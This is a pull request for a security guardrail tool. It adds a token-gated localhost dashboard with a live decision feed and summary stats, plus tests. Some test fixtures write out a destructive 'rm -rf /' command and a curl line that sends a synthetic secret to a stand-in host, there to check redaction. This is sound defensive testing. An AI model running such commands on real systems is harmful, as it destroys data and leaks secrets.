### PR TITLE
feat(dash): live decision feed (SSE) + summary stats (D2)

### DIFF
--- a/README.md
+++ b/README.md
@@ -311,15 +311,23 @@ Basic protection works immediately out of the box. Pick a strength mode to match
 ### 6. Dashboard (preview)
 
 ```bash
-pip install "doberman-core[dash]"   # optional extra: starlette + uvicorn
-doberman dash                       # prints a URL, e.g. http://127.0.0.1:8642/?token=...
+pip install "doberman-core[dash]"    # optional extra: starlette + uvicorn
+doberman dash --path .                # prints a URL, e.g. http://127.0.0.1:8642/?token=...
 ```
 
 A localhost-only web dashboard, off by default. Binds to `127.0.0.1` only (never a public
 interface) and generates a fresh, single-use token for that run — open the printed URL to
-connect; every API call is authenticated with that token. This preview slice is the serving
-skeleton only (an empty shell that confirms it's connected); the live decision feed, summary
-stats, and approve/deny actions land in upcoming versions.
+connect; every API call is authenticated with that token. `--path` selects the repo to report
+on (default: the current directory).
+
+Now live: a **summary stats line** (verdict counts, top reason codes, secret/taint event count,
+current mode + effective enforcement — `GET /api/stats`) and a **scrolling live decision feed**
+(`GET /api/feed`, Server-Sent Events) that backfills the most recent decisions on connect, then
+streams new ones as they're recorded. Both are read-only and serve only already-redacted decision-
+log fields (verdict, action type, path *class*, reason codes, timestamp) — never a raw target,
+argument, or secret. `EventSource` can't set request headers, so the feed also accepts the token
+as `?token=` (loopback-only + single-run token keeps this sound). Approve/deny actions and visual
+polish land in upcoming versions.
 
 ---
 

--- a/src/doberman/cli/main.py
+++ b/src/doberman/cli/main.py
@@ -659,14 +659,16 @@ _DASH_DEFAULT_PORT = 8642
 @app.command()
 def dash(
     port: int = typer.Option(_DASH_DEFAULT_PORT, "--port", help="Port to bind the dashboard to."),
+    path: str = typer.Option(".", "--path", "-p", help="Repository root to report on."),
 ) -> None:
     """Launch the local dashboard (preview) - a localhost-only control surface.
 
     Binds to 127.0.0.1 only, never a public interface. A fresh, single-use
     token is generated for this run and embedded in the printed URL; every API
-    route requires it as a bearer token, checked in constant time. Requires the
-    optional 'dash' extra; the live feed, stats, and approve/deny actions land
-    in later slices.
+    route requires it as a bearer token, checked in constant time. Reports the
+    live decision feed, summary stats, mode, and enforcement state for
+    ``--path`` (default: the current repo). Requires the optional 'dash'
+    extra; approve/deny actions and polish land in later slices.
     """
     try:
         import uvicorn
@@ -681,7 +683,7 @@ def dash(
 
     token = secrets.token_urlsafe(32)
     typer.echo(f"Dashboard: http://{_DASH_HOST}:{port}/?token={token}")
-    uvicorn.run(create_app(token), host=_DASH_HOST, port=port)
+    uvicorn.run(create_app(token, path), host=_DASH_HOST, port=port)
 
 
 @app.command()

--- a/src/doberman/dash/app.py
+++ b/src/doberman/dash/app.py
@@ -1,4 +1,4 @@
-"""Starlette app factory for the local dashboard (D1: serving skeleton only).
+"""Starlette app factory for the local dashboard (D1 skeleton + D2 feed/stats).
 
 Binds to ``127.0.0.1`` only; the ``doberman dash`` CLI command hands in a
 per-run bearer token generated with ``secrets.token_urlsafe(32)``. ``GET /``
@@ -14,20 +14,42 @@ extra (``starlette``, ``uvicorn``) not installed - see
 ``tests/unit/test_dash_serve.py`` and the import-linter contract forbidding
 the policy core from importing ``doberman.dash``.
 
-Later slices add the live decision feed (SSE), summary stats, and
-approve/deny actions; D1 is the skeleton only.
+D2 adds two READ-ONLY surfaces, both serving only already-redacted data (the
+decision log is redacted at write time - see ``doberman.storage.log``):
+
+* ``GET /api/stats`` - verdict counts, top reason codes, secret/taint event
+  count, current mode + effective enforcement. Bearer token via header only.
+* ``GET /api/feed`` - a Server-Sent Events stream: recent rows as backfill,
+  then newly-written rows as they land. Browser ``EventSource`` cannot set
+  request headers, so this route ALSO accepts the token as ``?token=``,
+  compared in constant time exactly like the header - sound here because the
+  server is loopback-only and the token is single-use per run (see
+  ``_feed_token_matches``).
+
+D3 (approve/deny) and D5 (polish) are later slices - not built here.
 """
 
 from __future__ import annotations
 
+import asyncio
 import hmac
+import json
+from collections.abc import AsyncIterator
 
 from starlette.applications import Starlette
 from starlette.requests import Request
-from starlette.responses import HTMLResponse, JSONResponse, Response
+from starlette.responses import HTMLResponse, JSONResponse, Response, StreamingResponse
 from starlette.routing import Route
 
+from doberman.dash.stats import build_stats, reason_codes
+from doberman.storage.log import read_decisions, read_decisions_since
+
 _BEARER_PREFIX = "Bearer "
+#: Rows sent immediately on `/api/feed` connect, oldest-first, before live polling starts.
+_FEED_BACKFILL_LIMIT = 50
+#: Default poll interval for new rows; overridable per `create_app` call (tests use a
+#: much shorter one so the feed test doesn't wait on the wall clock).
+_FEED_POLL_INTERVAL_S = 1.0
 
 # ponytail: one inline page, no build toolchain - real UI lands in a later slice.
 _HTML_SHELL = """<!doctype html>
@@ -51,11 +73,25 @@ _HTML_SHELL = """<!doctype html>
   .dot { width: .6rem; height: .6rem; border-radius: 50%; background: #888; flex: none; }
   .dot.ok { background: #3fb950; }
   .dot.err { background: #f85149; }
+  #stats { margin: 1rem 0; font-size: .85rem; opacity: .85; }
+  #feed {
+    list-style: none; margin: .5rem 0 0; padding: 0; max-height: 60vh;
+    overflow-y: auto; border: 1px solid #333; border-radius: 4px;
+  }
+  @media (prefers-color-scheme: light) { #feed { border-color: #ccc; } }
+  #feed li {
+    padding: .35rem .6rem; border-bottom: 1px solid #222; font-size: .8rem;
+    font-family: ui-monospace, "SF Mono", Consolas, monospace;
+  }
+  @media (prefers-color-scheme: light) { #feed li { border-color: #eee; } }
+  #feed li:last-child { border-bottom: none; }
 </style>
 </head>
 <body>
   <h1>Doberman Dashboard (preview)</h1>
   <div id="status"><span class="dot" id="dot"></span><span id="label">connecting...</span></div>
+  <div id="stats">stats loading...</div>
+  <ul id="feed"></ul>
   <script>
     (function () {
       var params = new URLSearchParams(window.location.search);
@@ -70,6 +106,9 @@ _HTML_SHELL = """<!doctype html>
 
       var dot = document.getElementById("dot");
       var label = document.getElementById("label");
+      var statsEl = document.getElementById("stats");
+      var feedEl = document.getElementById("feed");
+      var MAX_FEED_ROWS = 200;
 
       fetch("/api/health", { headers: { "Authorization": "Bearer " + token } })
         .then(function (res) {
@@ -84,6 +123,49 @@ _HTML_SHELL = """<!doctype html>
           dot.className = "dot err";
           label.textContent = "not connected";
         });
+
+      fetch("/api/stats", { headers: { "Authorization": "Bearer " + token } })
+        .then(function (res) {
+          if (!res.ok) { throw new Error("status " + res.status); }
+          return res.json();
+        })
+        .then(function (s) {
+          statsEl.textContent =
+            "decisions: " + s.total_decisions +
+            " | verdicts: " + JSON.stringify(s.verdict_counts) +
+            " | secret/taint events: " + s.secret_taint_events +
+            " | mode: " + s.mode + " | enforcement: " + s.enforcement;
+        })
+        .catch(function () {
+          statsEl.textContent = "stats unavailable";
+        });
+
+      // EventSource cannot set request headers, so the token travels as a
+      // query param here only (see doberman.dash.app._feed_token_matches).
+      try {
+        var source = new EventSource("/api/feed?token=" + encodeURIComponent(token));
+        source.addEventListener("decision", function (evt) {
+          var row;
+          try {
+            row = JSON.parse(evt.data);
+          } catch (e) {
+            return;
+          }
+          var li = document.createElement("li");
+          // textContent only - a row-derived string must render literally,
+          // never as markup (mirrors the TUI's markup=False discipline).
+          li.textContent = "[" + row.verdict + "] " + row.action_type +
+            " " + (row.target_path_class || "-") +
+            " " + (row.reason_codes && row.reason_codes.length ? row.reason_codes.join(",") : "-") +
+            " @ " + row.ts;
+          feedEl.appendChild(li);
+          while (feedEl.children.length > MAX_FEED_ROWS) {
+            feedEl.removeChild(feedEl.firstChild);
+          }
+        });
+      } catch (e) {
+        // EventSource unsupported/blocked - the feed just stays empty.
+      }
     })();
   </script>
 </body>
@@ -103,6 +185,23 @@ def _token_matches(request: Request, token: str) -> bool:
     return hmac.compare_digest(supplied, token)
 
 
+def _feed_token_matches(request: Request, token: str) -> bool:
+    """Auth check for ``/api/feed`` only: header OR ``?token=`` query param.
+
+    Browser ``EventSource`` cannot set custom request headers, so the header
+    check alone would lock the dashboard's own feed UI out of its own feed.
+    Accepting the token as a query param here is sound specifically because:
+    the server is bound to 127.0.0.1 only (never reachable off-box), and the
+    token is a fresh, single-run secret (not a long-lived credential) - so a
+    query-string leak (proxy logs, shell history) has a narrow blast radius
+    scoped to one local dashboard session. Still constant-time compared.
+    """
+    if _token_matches(request, token):
+        return True
+    supplied = request.query_params.get("token", "")
+    return hmac.compare_digest(supplied, token)
+
+
 async def _index(request: Request) -> Response:
     # No auth: the shell carries no data, only the JS that reads the token
     # back out of its own URL and calls the authenticated API routes.
@@ -118,14 +217,107 @@ def _make_health_route(token: str) -> Route:
     return Route("/api/health", health)
 
 
-def create_app(token: str) -> Starlette:
+def _make_stats_route(token: str, repo_root: str) -> Route:
+    async def stats(request: Request) -> Response:
+        if not _token_matches(request, token):
+            return _unauthorized()
+        return JSONResponse(await build_stats(repo_root))
+
+    return Route("/api/stats", stats)
+
+
+def _feed_row(row: dict) -> dict:
+    """The ONLY fields the feed ever serializes - exactly what the TUI shows.
+
+    ``row`` comes from :func:`doberman.storage.log.read_decisions`/
+    ``read_decisions_since``, already redacted at write time (path *class*,
+    not a raw path; no raw arguments; no secrets). This picks a further
+    subset - e.g. ``agent_role``/``source_context``/``auth_result`` are
+    dropped even though they're on the row - per the D2 rule of only ever
+    passing through what the decision-transparency TUI itself displays.
+    """
+    return {
+        "id": row.get("id"),
+        "ts": row.get("ts"),
+        "verdict": row.get("final_verdict"),
+        "action_type": row.get("action_type"),
+        "target_path_class": row.get("target_path_class"),
+        "reason_codes": reason_codes(row),
+    }
+
+
+def _sse_event(row: dict) -> str:
+    return f"event: decision\ndata: {json.dumps(_feed_row(row))}\n\n"
+
+
+def _make_feed_route(
+    token: str,
+    repo_root: str,
+    *,
+    poll_interval: float = _FEED_POLL_INTERVAL_S,
+    max_polls: int | None = None,
+    backfill_limit: int = _FEED_BACKFILL_LIMIT,
+) -> Route:
+    async def feed(request: Request) -> Response:
+        if not _feed_token_matches(request, token):
+            return _unauthorized()
+
+        async def event_stream() -> AsyncIterator[str]:
+            # Backfill: most recent `backfill_limit` rows, oldest first, so
+            # the feed reads top-to-bottom in the order things happened.
+            backfill = await read_decisions(repo_root, limit=backfill_limit)
+            backfill.reverse()
+            last_id = 0
+            for row in backfill:
+                last_id = max(last_id, row.get("id") or 0)
+                yield _sse_event(row)
+
+            # Live poll: cursor-based "what's new since the last id I sent".
+            # `max_polls=None` (production) polls forever - a real ASGI
+            # server streams each yield to the socket incrementally. Tests
+            # pass a small bound instead: both starlette.testclient.TestClient
+            # and httpx.ASGITransport fully await this generator to
+            # completion before handing back any response bytes, so an
+            # unbounded loop would hang a test forever rather than merely
+            # "not stream incrementally" - bounding it is what makes the
+            # route testable at all without a real socket.
+            polls = 0
+            while max_polls is None or polls < max_polls:
+                await asyncio.sleep(poll_interval)
+                new_rows = await read_decisions_since(repo_root, last_id)
+                for row in new_rows:
+                    last_id = max(last_id, row.get("id") or 0)
+                    yield _sse_event(row)
+                polls += 1
+
+        return StreamingResponse(event_stream(), media_type="text/event-stream")
+
+    return Route("/api/feed", feed)
+
+
+def create_app(
+    token: str,
+    repo_root: str = ".",
+    *,
+    feed_poll_interval: float = _FEED_POLL_INTERVAL_S,
+    feed_max_polls: int | None = None,
+) -> Starlette:
     """Build the dashboard's Starlette app, bound to one per-run ``token``.
 
     ``GET /`` is unauthenticated (no data). Every ``/api/*`` route requires
-    the bearer token, checked in constant time.
+    the bearer token, checked in constant time (``/api/feed`` also accepts it
+    as ``?token=`` - see :func:`_feed_token_matches`). ``repo_root`` is the
+    repo the dash was launched in - the same root every stats/feed read is
+    scoped to. ``feed_poll_interval``/``feed_max_polls`` exist so tests can
+    bound and speed up the feed's live-poll loop; production leaves both at
+    their defaults (real interval, unbounded).
     """
     routes = [
         Route("/", _index),
         _make_health_route(token),
+        _make_stats_route(token, repo_root),
+        _make_feed_route(
+            token, repo_root, poll_interval=feed_poll_interval, max_polls=feed_max_polls
+        ),
     ]
     return Starlette(routes=routes)

--- a/src/doberman/dash/stats.py
+++ b/src/doberman/dash/stats.py
@@ -1,0 +1,104 @@
+"""Redaction-safe summary stats for the dashboard (D2).
+
+Aggregates over exactly the rows :func:`doberman.storage.log.read_decisions`
+already returns for the CLI (``doberman log`` / ``doberman memory``) and the
+TUI - no new query layer, no field this module invents on its own. Every value
+here is derived from already-redacted columns (verdict, action type, path
+*class*, reason codes) - never a raw target, argument, or secret.
+"""
+
+from __future__ import annotations
+
+import json
+from collections import Counter
+
+from doberman.config import load_enforcement, load_mode
+from doberman.policy.drift import effective_enforcement
+from doberman.storage.log import read_decisions
+
+# Reason codes that flag a secret- or taint-related event: the Feature 3
+# secret/exfil rules, the HK.5 multi-step read-then-send exfiltration floor,
+# and the smuggled-token-channel defense. A dash-presentation grouping (not a
+# decision-path constant), so it lives here rather than in doberman.models.
+SECRET_TAINT_REASON_CODES = frozenset(
+    {
+        "secret_exfiltration",
+        "sensitive_secret_access",
+        "possible_high_entropy_secret",
+        "encoded_exfiltration",
+        "multi_step_exfil",
+        "confirmed_exfil",
+        "smuggled_token_channel",
+        "anomalous_token_pattern",
+    }
+)
+
+_DEFAULT_RECENT_WINDOW = 50
+
+
+def reason_codes(row: dict) -> list[str]:
+    """Parse a decision row's ``reason_codes_json`` defensively (never raises).
+
+    Mirrors ``doberman.tui._reason_codes_text``'s tolerance for a tampered or
+    corrupt row - bad JSON or an unexpected shape yields ``[]``, never a crash.
+    """
+    try:
+        codes = json.loads(row.get("reason_codes_json") or "[]")
+    except (TypeError, ValueError):
+        return []
+    if not isinstance(codes, list):
+        return []
+    return [str(code) for code in codes]
+
+
+async def _current_enforcement(repo_root: str) -> str:
+    """Ledger-verified effective enforcement, async-safe for a running loop.
+
+    Mirrors ``doberman.config.resolve_enforcement_sync`` but awaits
+    :func:`doberman.policy.drift.effective_enforcement` directly instead of
+    bridging with ``asyncio.run`` - the dash route already runs inside an
+    event loop, where ``resolve_enforcement_sync`` would fail closed to
+    "enforce" every time (it refuses to nest ``asyncio.run``).
+    """
+    enforcement, expires_at, revert = load_enforcement(repo_root)
+    if str(enforcement).strip().lower() == "enforce":
+        return "enforce"
+    try:
+        return await effective_enforcement(
+            repo_root, enforcement=enforcement, expires_at=expires_at, revert=revert
+        )
+    except Exception:  # noqa: BLE001 — stats must never crash the dash; fail closed
+        return "enforce"
+
+
+async def build_stats(repo_root: str, *, recent_window: int = _DEFAULT_RECENT_WINDOW) -> dict:
+    """Redaction-safe stats for ``GET /api/stats``.
+
+    Verdict counts (all-time + a recent window), the top reason codes, a count
+    of secret/taint-related events, and the current mode + effective
+    enforcement dial. Fails closed: a missing/empty DB (``read_decisions``
+    already returns ``[]``) yields all-zero stats, never an error.
+    """
+    rows = await read_decisions(repo_root)  # newest first
+    verdict_counts = Counter(row["final_verdict"] for row in rows)
+    recent_rows = rows[:recent_window]
+    recent_verdict_counts = Counter(row["final_verdict"] for row in recent_rows)
+
+    reason_counts: Counter[str] = Counter()
+    secret_taint_events = 0
+    for row in rows:
+        codes = reason_codes(row)
+        reason_counts.update(codes)
+        if SECRET_TAINT_REASON_CODES.intersection(codes):
+            secret_taint_events += 1
+
+    return {
+        "total_decisions": len(rows),
+        "verdict_counts": dict(verdict_counts),
+        "recent_window": recent_window,
+        "recent_verdict_counts": dict(recent_verdict_counts),
+        "top_reason_codes": reason_counts.most_common(5),
+        "secret_taint_events": secret_taint_events,
+        "mode": load_mode(repo_root),
+        "enforcement": await _current_enforcement(repo_root),
+    }

--- a/src/doberman/storage/log.py
+++ b/src/doberman/storage/log.py
@@ -54,10 +54,35 @@ _UPSERT_FINGERPRINT = (
 )
 
 _SELECT_DECISIONS = (
-    "SELECT ts, action_id, agent_role, action_type, target_path_class, risk, source_context, "
+    "SELECT id, ts, action_id, agent_role, action_type, target_path_class, risk, source_context, "
     "final_verdict, decided_layer, reason_codes_json, auth_required, auth_result, elevation_id "
     "FROM decisions ORDER BY id DESC"
 )
+
+# Mirrors _SELECT_DECISIONS but ascending + cursor-bounded, for the dash's live
+# feed poll (doberman.dash): "give me what's new since the last row I saw".
+_SELECT_DECISIONS_SINCE = (
+    "SELECT id, ts, action_id, agent_role, action_type, target_path_class, risk, source_context, "
+    "final_verdict, decided_layer, reason_codes_json, auth_required, auth_result, elevation_id "
+    "FROM decisions WHERE id > ? ORDER BY id ASC"
+)
+
+_DECISION_COLUMNS = [
+    "id",
+    "ts",
+    "action_id",
+    "agent_role",
+    "action_type",
+    "target_path_class",
+    "risk",
+    "source_context",
+    "final_verdict",
+    "decided_layer",
+    "reason_codes_json",
+    "auth_required",
+    "auth_result",
+    "elevation_id",
+]
 
 
 def _path_class(action: SecurityObject) -> str | None:
@@ -243,28 +268,36 @@ async def read_decisions(repo_root: str, *, limit: int | None = None) -> list[di
     if not db_path(repo_root).exists():
         return []
     query = _SELECT_DECISIONS + (f" LIMIT {int(limit)}" if limit else "")
-    cols = [
-        "ts",
-        "action_id",
-        "agent_role",
-        "action_type",
-        "target_path_class",
-        "risk",
-        "source_context",
-        "final_verdict",
-        "decided_layer",
-        "reason_codes_json",
-        "auth_required",
-        "auth_result",
-        "elevation_id",
-    ]
     try:
         async with open_db(repo_root) as conn:
             async with conn.execute(query) as cur:
                 rows = await cur.fetchall()
     except Exception:  # noqa: BLE001 — a read failure must never crash the CLI
         return []
-    return [dict(zip(cols, row, strict=True)) for row in rows]
+    return [dict(zip(_DECISION_COLUMNS, row, strict=True)) for row in rows]
+
+
+async def read_decisions_since(
+    repo_root: str, since_id: int, *, limit: int | None = None
+) -> list[dict]:
+    """Read decision rows with ``id > since_id``, oldest first (cursor-based poll).
+
+    For the dash's live feed (``doberman.dash``): pass the highest ``id`` already
+    seen and get back only what's new. Same shape/columns as :func:`read_decisions`
+    and the same fail-closed-to-``[]`` behavior (missing/locked DB, any error).
+    """
+    from doberman.storage.db import db_path
+
+    if not db_path(repo_root).exists():
+        return []
+    query = _SELECT_DECISIONS_SINCE + (f" LIMIT {int(limit)}" if limit else "")
+    try:
+        async with open_db(repo_root) as conn:
+            async with conn.execute(query, (since_id,)) as cur:
+                rows = await cur.fetchall()
+    except Exception:  # noqa: BLE001 — a read failure must never crash the dash
+        return []
+    return [dict(zip(_DECISION_COLUMNS, row, strict=True)) for row in rows]
 
 
 async def memory_summary(repo_root: str) -> dict:

--- a/tests/unit/test_dash_feed_stats.py
+++ b/tests/unit/test_dash_feed_stats.py
@@ -1,0 +1,288 @@
+"""Unit tests for the D2 dashboard read-only surfaces (``/api/stats``, ``/api/feed``).
+
+D2 adds a live decision feed (SSE) and summary stats on top of the D1 serving
+skeleton - both read-only, both bearer-token gated. Covers:
+
+* auth on both routes, including the feed's ``?token=`` query-param fallback
+  (EventSource cannot set headers);
+* stats math against a seeded decision log;
+* the feed's backfill-then-poll shape (seeded rows on connect, a live row
+  written after connect);
+* the redaction guarantee: a synthetic secret in an action's target never
+  reaches any response body, because the log only ever stores the redacted
+  path *class* - never the raw target;
+* empty/missing DB -> 200 with empty feed / zero stats, never a crash.
+
+The feed route's ``max_polls`` is a test-only bound (see ``doberman.dash.app``
+for why: both ``starlette.testclient.TestClient`` and ``httpx.ASGITransport``
+fully await the ASGI call before returning any response bytes, so an
+unbounded live-poll generator would hang the test client forever rather than
+merely "not stream incrementally").
+"""
+
+import json
+from datetime import datetime, timezone
+
+from starlette.testclient import TestClient
+
+from doberman.dash.app import create_app
+from doberman.models import (
+    ActionType,
+    Decision,
+    GuardrailResult,
+    ReasonCode,
+    Risk,
+    SecurityObject,
+    SourceContext,
+    Verdict,
+)
+from doberman.storage.log import record_decision
+
+_TOKEN = "test-dash-token-0123456789"  # noqa: S105 - fixture value, not a real secret
+_SECRET = "SYNTHETIC-SECRET-AKIA0000TEST"  # noqa: S105 - synthetic test fixture, not a real key
+_NOW = datetime(2026, 7, 18, tzinfo=timezone.utc)
+
+
+async def _seed(
+    root: str,
+    *,
+    action_id: str,
+    verdict: Verdict,
+    reason_codes: list[ReasonCode],
+    action_type: ActionType = ActionType.shell_exec,
+    target: str = "rm -rf /",
+    risk: Risk = Risk.critical,
+) -> None:
+    # A non-PASS Decision requires >=1 reason code (Decision's own validator),
+    # so a caller that wants BLOCK/AUTH with an "empty" reason must still pass
+    # a placeholder - tests below always pass a real code for non-PASS seeds.
+    objective = GuardrailResult(
+        verdict=verdict, risk=risk, reason_codes=reason_codes, explanation="seeded for test"
+    )
+    decision = Decision(
+        action_id=action_id,
+        final_verdict=verdict,
+        final_risk=risk,
+        objective=objective,
+        reason_codes=reason_codes,
+        explanation="seeded for test",
+        decided_at=_NOW,
+    )
+    action = SecurityObject(
+        id=action_id,
+        ts=_NOW,
+        agent_role="cli",
+        action_type=action_type,
+        tool_name="bash",
+        target=target,
+        source_context=SourceContext.user,
+    )
+    await record_decision(decision, action, repo_root=root, auth_result="seeded")
+
+
+def _sse_events(body: str) -> list[dict]:
+    """Parse ``event: decision\\ndata: {...}\\n\\n`` blocks back into dicts."""
+    events = []
+    for block in body.split("\n\n"):
+        if not block.strip():
+            continue
+        for line in block.splitlines():
+            if line.startswith("data: "):
+                events.append(json.loads(line[len("data: ") :]))
+    return events
+
+
+# --------------------------------------------------------------------------
+# Auth
+# --------------------------------------------------------------------------
+
+
+def test_stats_without_token_is_401(tmp_path):
+    client = TestClient(create_app(_TOKEN, str(tmp_path)))
+    resp = client.get("/api/stats")
+    assert resp.status_code == 401
+
+
+def test_stats_with_wrong_token_is_401(tmp_path):
+    client = TestClient(create_app(_TOKEN, str(tmp_path)))
+    resp = client.get("/api/stats", headers={"Authorization": "Bearer nope"})
+    assert resp.status_code == 401
+
+
+def test_feed_without_token_is_401(tmp_path):
+    client = TestClient(create_app(_TOKEN, str(tmp_path), feed_max_polls=0))
+    resp = client.get("/api/feed")
+    assert resp.status_code == 401
+
+
+def test_feed_with_wrong_query_token_is_401(tmp_path):
+    client = TestClient(create_app(_TOKEN, str(tmp_path), feed_max_polls=0))
+    resp = client.get("/api/feed?token=nope")
+    assert resp.status_code == 401
+
+
+def test_feed_accepts_correct_query_token(tmp_path):
+    client = TestClient(create_app(_TOKEN, str(tmp_path), feed_max_polls=0))
+    resp = client.get(f"/api/feed?token={_TOKEN}")
+    assert resp.status_code == 200
+
+
+def test_feed_accepts_correct_header_token(tmp_path):
+    client = TestClient(create_app(_TOKEN, str(tmp_path), feed_max_polls=0))
+    resp = client.get("/api/feed", headers={"Authorization": f"Bearer {_TOKEN}"})
+    assert resp.status_code == 200
+
+
+# --------------------------------------------------------------------------
+# Stats math
+# --------------------------------------------------------------------------
+
+
+async def test_stats_reports_verdict_and_reason_code_counts(tmp_path):
+    root = str(tmp_path)
+    await _seed(
+        root,
+        action_id="a1",
+        verdict=Verdict.BLOCK,
+        reason_codes=[ReasonCode.destructive_command],
+    )
+    await _seed(
+        root,
+        action_id="a2",
+        verdict=Verdict.BLOCK,
+        reason_codes=[ReasonCode.destructive_command],
+    )
+    await _seed(
+        root,
+        action_id="a3",
+        verdict=Verdict.PASS,
+        reason_codes=[],
+        action_type=ActionType.file_read,
+        target="README.md",
+        risk=Risk.low,
+    )
+    await _seed(
+        root,
+        action_id="a4",
+        verdict=Verdict.AUTH,
+        reason_codes=[ReasonCode.sensitive_secret_access],
+        action_type=ActionType.network_request,
+        target="https://example.com",
+        risk=Risk.high,
+    )
+
+    client = TestClient(create_app(_TOKEN, root, feed_max_polls=0))
+    resp = client.get("/api/stats", headers={"Authorization": f"Bearer {_TOKEN}"})
+    assert resp.status_code == 200
+    body = resp.json()
+
+    assert body["total_decisions"] == 4
+    assert body["verdict_counts"] == {"BLOCK": 2, "PASS": 1, "AUTH": 1}
+    assert body["top_reason_codes"][0] == ["destructive_command", 2]
+    # a4 carries a secret-taint reason code -> counted; a1-a3 do not.
+    assert body["secret_taint_events"] == 1
+    assert body["mode"]
+    assert body["enforcement"]
+
+
+async def test_empty_or_missing_db_yields_zero_stats(tmp_path):
+    # Nothing seeded - the DB file doesn't exist yet.
+    client = TestClient(create_app(_TOKEN, str(tmp_path), feed_max_polls=0))
+    resp = client.get("/api/stats", headers={"Authorization": f"Bearer {_TOKEN}"})
+    assert resp.status_code == 200
+    body = resp.json()
+    assert body["total_decisions"] == 0
+    assert body["verdict_counts"] == {}
+    assert body["secret_taint_events"] == 0
+
+
+# --------------------------------------------------------------------------
+# Feed: backfill + live update
+# --------------------------------------------------------------------------
+
+
+async def test_feed_backfill_returns_seeded_rows_oldest_first(tmp_path):
+    root = str(tmp_path)
+    await _seed(
+        root, action_id="b1", verdict=Verdict.BLOCK, reason_codes=[ReasonCode.destructive_command]
+    )
+    await _seed(root, action_id="b2", verdict=Verdict.PASS, reason_codes=[])
+
+    client = TestClient(create_app(_TOKEN, root, feed_poll_interval=0.01, feed_max_polls=0))
+    resp = client.get("/api/feed", headers={"Authorization": f"Bearer {_TOKEN}"})
+    assert resp.status_code == 200
+    assert resp.headers["content-type"].startswith("text/event-stream")
+
+    events = _sse_events(resp.text)
+    assert [e["verdict"] for e in events] == ["BLOCK", "PASS"]
+
+
+async def test_feed_empty_backfill_when_db_missing(tmp_path):
+    client = TestClient(
+        create_app(_TOKEN, str(tmp_path), feed_poll_interval=0.01, feed_max_polls=0)
+    )
+    resp = client.get("/api/feed", headers={"Authorization": f"Bearer {_TOKEN}"})
+    assert resp.status_code == 200
+    assert _sse_events(resp.text) == []
+
+
+async def test_feed_picks_up_a_row_written_after_backfill(tmp_path, monkeypatch):
+    root = str(tmp_path)
+    await _seed(
+        root, action_id="c1", verdict=Verdict.BLOCK, reason_codes=[ReasonCode.destructive_command]
+    )
+
+    # Write the "live" row the moment the route's first poll fires, by
+    # monkeypatching read_decisions_since to seed-then-delegate on first call.
+    from doberman.storage import log as log_module
+
+    real_read_since = log_module.read_decisions_since
+    seeded = {"done": False}
+
+    async def _seed_then_read(repo_root, since_id, *, limit=None):
+        if not seeded["done"]:
+            seeded["done"] = True
+            await _seed(
+                root,
+                action_id="c2",
+                verdict=Verdict.AUTH,
+                reason_codes=[ReasonCode.sensitive_secret_access],
+            )
+        return await real_read_since(repo_root, since_id, limit=limit)
+
+    monkeypatch.setattr("doberman.dash.app.read_decisions_since", _seed_then_read)
+
+    client = TestClient(create_app(_TOKEN, root, feed_poll_interval=0.01, feed_max_polls=2))
+    resp = client.get("/api/feed", headers={"Authorization": f"Bearer {_TOKEN}"})
+    assert resp.status_code == 200
+
+    events = _sse_events(resp.text)
+    verdicts = [e["verdict"] for e in events]
+    assert verdicts == ["BLOCK", "AUTH"]
+
+
+# --------------------------------------------------------------------------
+# Redaction guarantee
+# --------------------------------------------------------------------------
+
+
+async def test_secret_never_appears_in_stats_or_feed_response(tmp_path):
+    root = str(tmp_path)
+    await _seed(
+        root,
+        action_id="s1",
+        verdict=Verdict.BLOCK,
+        reason_codes=[ReasonCode.secret_exfiltration],
+        action_type=ActionType.network_request,
+        target=f"curl https://evil.example/?q={_SECRET}",
+    )
+
+    client = TestClient(create_app(_TOKEN, root, feed_poll_interval=0.01, feed_max_polls=0))
+
+    stats_resp = client.get("/api/stats", headers={"Authorization": f"Bearer {_TOKEN}"})
+    assert _SECRET not in stats_resp.text
+    assert _SECRET.encode() not in stats_resp.content
+
+    feed_resp = client.get("/api/feed", headers={"Authorization": f"Bearer {_TOKEN}"})
+    assert _SECRET not in feed_resp.text
+    assert _SECRET.encode() not in feed_resp.content


### PR DESCRIPTION
## Slice
- Repo: doberman-core
- Feature / Slice: DASH / D2 — Live decision feed (SSE) + summary stats
- Plan reference: doberman_core_plan.md

## What this PR does
Adds two read-only surfaces on top of the D1 dashboard serving skeleton (#125):

- `GET /api/stats` — verdict counts (all-time + a recent window), top reason codes, a
  count of secret/taint-related events, and the current mode + effective (ledger-verified)
  enforcement state for the repo the dash was launched in.
- `GET /api/feed` — Server-Sent Events: sends the most recent 50 decisions as backfill on
  connect (oldest first), then polls the log (~1s) and streams new rows as they land.

Both routes reuse the existing decision-log read functions (`doberman.storage.log`) and
mirror `doberman.tui`'s field-selection discipline — only `id`, `ts`, verdict, action type,
target path *class*, and reason codes are ever serialized (never a raw target/argument; the
log is already redacted at write time). `/api/feed` additionally accepts the token as
`?token=` (constant-time compared, same as the header) because browser `EventSource` cannot
set custom request headers — sound here because the server is loopback-only and the token is
a fresh single-run secret. `doberman dash` gains a `--path`/`-p` option so stats/feed report
on the repo it was launched against, not just the CLI's cwd.

The inline HTML shell (no build toolchain, per D1) now shows a stats line and a scrolling
feed list; feed rows render via `textContent` only (never `innerHTML`), so a row-derived
string can never be interpreted as markup.

Storage layer: `src/doberman/storage/log.py` gained `read_decisions_since(repo_root,
since_id)` (cursor-based "what's new" read, ascending, same fail-closed-to-`[]` behavior as
`read_decisions`) and an `id` column on `read_decisions`'s existing rows — the minimal helper
the plan allows when no such read API exists yet.

## Tests added (run in CI)
- `tests/unit/test_dash_feed_stats.py` (12 tests):
  - Auth: `/api/stats` and `/api/feed` reject missing/wrong token (401), including `/api/feed`'s
    `?token=` variant (both the wrong-token and correct-token cases, for header and query param).
  - Stats math: a seeded log with a known verdict/reason-code mix produces the expected
    `total_decisions`, `verdict_counts`, `top_reason_codes`, and `secret_taint_events`.
  - Feed backfill: seeded rows arrive as SSE `event: decision` blocks, oldest-first, on connect.
  - Live update: a row written after the feed's first poll appears in the stream (via a
    monkeypatched `read_decisions_since` that seeds a row exactly when the poll first fires).
  - Redaction guarantee: a decision seeded with a synthetic AWS-key-shaped secret in its raw
    target — the secret string never appears in the raw bytes of either the stats or feed
    response.
  - Empty/missing DB: both routes return 200 with zero stats / an empty feed, never a crash.
- Existing `tests/unit/test_dash_serve.py` (D1, 8 tests) and `tests/unit/test_core_is_standalone.py`
  (10 tests) still pass unchanged — confirms this doesn't regress D1 or the no-enterprise-installed
  guarantee.

